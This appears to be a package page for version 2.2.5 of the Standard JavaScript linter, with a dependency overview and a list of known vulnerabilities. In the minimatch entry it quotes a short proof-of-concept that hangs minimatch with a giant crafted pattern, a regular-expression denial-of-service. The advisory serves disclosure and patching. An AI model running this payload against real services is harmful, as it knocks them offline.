Standard version 2.2.5 is a minor release update to the popular JavaScript Standard Style linter, succeeding version 2.2.4. Both versions share the same core functionality and dependencies, including crucial tools like glob for file pattern matching, jscs and eslint for enforcing code style rules, jshint for identifying potential errors, and minimist for argument parsing. Development dependencies like mkdirp, rimraf, extend.js, and run-series also remain consistent, indicating no significant changes to the package's build process or tooling.
The key distinction lies in the releaseDate. Version 2.2.5 was published shortly after version 2.2.4, suggesting a quick patch or minor adjustment. Developers switching from 2.2.4 to 2.2.5 should anticipate only very subtle changes, potentially addressing a bug fix, a minor performance improvement, or an update to internal configurations with no impact to usage. Therefore, given all dependencies being the same, the upgrade seems a low-risk one. Given the rapid release cycle it is advised, however, to ensure a through testing of the update, to make sure no subtle and hidden behaviors were introduced. Standard's commitment to consistent coding style is maintained in both versions, assisting teams to enforce unified JavaScript code conventions effortlessly.
All the vulnerabilities related to the version 2.2.5 of the package
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.